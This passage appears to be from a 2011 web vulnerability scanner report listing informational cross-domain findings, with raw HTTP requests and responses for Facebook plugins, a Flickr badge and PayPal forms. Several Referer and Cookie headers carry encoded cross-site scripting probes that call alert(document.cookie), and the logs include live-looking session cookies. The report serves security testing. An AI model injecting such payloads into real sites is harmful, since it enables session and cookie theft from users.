com.lb\/wp-content\/plugins\/fbconnect\/xd_receiver.htm","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

18.13. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:25:11 GMT
Content-Length: 10046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d3dfc4761cdc8366506904" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>WHDH-TV - Commuter rail service updates for Jan. 24</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Undo</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 29 others recommend this.</span><span class="connect_widget_not_connected_text">29 recommendations. 
<img class="fbLikeButtonTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&amp;partner_id=www1.whdh.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&amp;extra_2=US" /><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=www1.whdh.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww1.whdh.com%2Fnews%2Farticles%2Flocal%2F12003359267921%2Fcommuter-rail-service-updates-for-jan-24%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_span hidden_
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/&layout=standard&show-faces=true&width=450&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252Fcustom%252Fterm%252Fhealth_beauty9c672%252522%25253E%25253Cimg%252520src%25253da%252520onerror%25253dalert%2528document.cookie%2529%25253Ebcac4069246%252F576%26extra_2%3DUS; wd=300x250

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 22:26:25 GMT
Content-Length: 9659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d3dfc91529299101523581" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>WHDH-TV - Commuter rail service updates for Jan. 24</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Undo</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 29 others recommend this.</span><span class="connect_widget_not_connected_text">29 recommendations. 
<img class="fbLikeButtonTrackingPixel img" src="/campaign/impression.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" /><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Undo</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect
...[SNIP]...

18.14. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Tue, 25 Jan 2011 02:46:34 GMT
Content-Length: 12910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d3e398aa3f836209239993" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Beirut.com</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></div></div></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div></div></div></div><div class="connections"><span class="total total_plus hidden_elem">4,557</span><span class="total">4,556</span> people like Beirut.com<div class="connections_grid clearfix"><div class="grid_item grid_item_plus user_profile hidden_elem"><a href="" target="_blank"><img class="img" 
src="http://b.static.ak.fbcdn.net/rsrc
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbeirutcityguide&width=250&colorscheme=light&connections=8&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Tue, 25 Jan 2011 02:47:46 GMT
Content-Length: 12764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d3e39d2a40cb0401874559" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Beirut.com</b>.<span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="mls connect_widget_unlike_link">Unlike</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span></div></div></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div></div></div></div><div class="connections"><span class="total total_plus hidden_elem">4,557</span><span class="total">4,556</span> people like Beirut.com<div class="connections_grid clearfix"><div class="grid_item grid_item_plus user_profile hidden_elem"><a href="" target="_blank"><img class="img" 
src="http://b.static.ak.fbcdn.net/rsrc
...[SNIP]...

18.15. http://www.flickr.com/badge_code_v2.gne

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flickr.com
Path:   /badge_code_v2.gne

Request 1

GET /badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:44:59 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:44:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www45.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2168

var b_txt = '';

// write the badge
   
   
                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<img src="http://geo.yahoo.com/p?s=792600102&t=d1dfc89598702b40d584f63b47ad0017&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>';

document.write(b_txt);

Request 2

GET /badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:45:02 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:45:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www100.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2131

var b_txt = '';

// write the badge
   
   
                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<img src="http://geo.yahoo.com/p?s=792600102&t=001dea3dd0ca065bf110eb0eb15adbcd&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>';

document.write(b_txt);

19. Cross-domain POST
There are 28 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


19.1. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comunidadjoomla.org
Path:   /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • hosted_button_id
  • submit

Request

GET /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html HTTP/1.1
Host: comunidadjoomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8861b4e100db4cb878a33db82bc27555=00a1c10319baac94765f70e3f43fd867; path=/
Last-Modified: Mon, 24 Jan 2011 14:55:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-es" lang="es-es" dir=
...[SNIP]...
<center><form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.2. http://flybase.org/reports/FBgn0000146.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flybase.org
Path:   /reports/FBgn0000146.html/x22

Issue detail

The page contains a form which POSTs data to the domain www.sdbonline.org. The form contains the following fields:
  • submit

Request

GET /reports/FBgn0000146.html/x22 HTTP/1.1
Host: flybase.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:51 GMT
Server: Apache/1.3.26
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 24 Jan 2011 15:11:51 GMT
Content-Type: text/html;charset=UTF-8
set-cookie: BALANCEID=balancer.chervil; path=/;
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 493133


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv
...[SNIP]...
<li><form method="post" action="http://www.sdbonline.org/fly/dbzhnsky/auberg1.htm" target="_blank"><p>
...[SNIP]...

19.3. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomla.pl
Path:   /powiadomienia/577-joomla-16-wydany.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • encrypted
  • submit

Request

GET /powiadomienia/577-joomla-16-wydany.html HTTP/1.1
Host: joomla.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:05 GMT
Server: Apache
Set-Cookie: 4133b150d3474bb471372c7e0b1cd514=f7c7ef79892a51ea61ed57003bef1c55; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" >
...[SNIP]...
<br /><form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.4. http://lesterchan.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lesterchan.net
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • hosted_button_id
  • submit

Request

GET / HTTP/1.1
Host: lesterchan.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 SVN/1.6.15 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://lesterchan.net/xmlrpc.php
Set-Cookie: PHPSESSID=4c415ee2862c176ec82733815b99874f; path=/
Set-Cookie: wpthisvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_posts=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_comments=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Lester Chan
...[SNIP]...
<li><form action="https://www.paypal.com/cgi-bin/webscr" method="post"><p style="display: none;">
...[SNIP]...

19.5. http://noisybox.net/computers/nzbperl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://noisybox.net
Path:   /computers/nzbperl/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • submit
  • encrypted

Request

GET /computers/nzbperl/ HTTP/1.1
Host: noisybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <link rel="icon" href="/images/favicon.ico" type="image/x-icon"/>
   <link re
...[SNIP]...
<div>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<div style='float: right; font-size: 9px; text-align: center;'>
...[SNIP]...

19.6. http://venedet.michnica.net/download/donate.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /download/donate.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • hosted_button_id
  • submit

Request

GET /download/donate.html HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:35 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Wed, 12 Jan 2011 06:16:03 GMT
ETag: "992be9-1c8-499a022b5cec0"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 456

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="36RNXGMCASXME">
<input typ
...[SNIP]...

19.7. http://www.autotraderclassics.com/find/index.xhtml/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /find/index.xhtml/x22

Issue detail

The page contains a form which POSTs data to the domain server.iad.liveperson.net. The form contains the following fields:
  • cmd
  • surveyname
  • udename!survey1876075
  • udename!name
  • udename!survey1876071
  • udename!survey1876072
  • udename!tkt_email
  • udename!survey1876073
  • udename!survey1876073
  • udename!survey1876073
  • udename!survey1876073
  • udename!survey1876073
  • udename!subject
  • udename!survey1876074
  • udename!survey1876074
  • udename!survey1876074
  • udename!survey1876074
  • Submit

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<div id="feedbackModalModal" class="atx-modal-content" style="display: none">

<form method="POST" id="message" name="message" class="user-form"
action="http://server.iad.liveperson.net/hc/s-86335200/web/ticketpub/msgController.jsp"
enctype="multipart/form-data" onsubmit="return validateFeedback('message')">


<div class="column-group feedback clearfix">
...[SNIP]...

19.8. http://www.autotraderclassics.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /x22

Issue detail

The page contains a form which POSTs data to the domain server.iad.liveperson.net. The form contains the following fields:
  • cmd
  • surveyname
  • udename!survey1876075
  • udename!name
  • udename!survey1876071
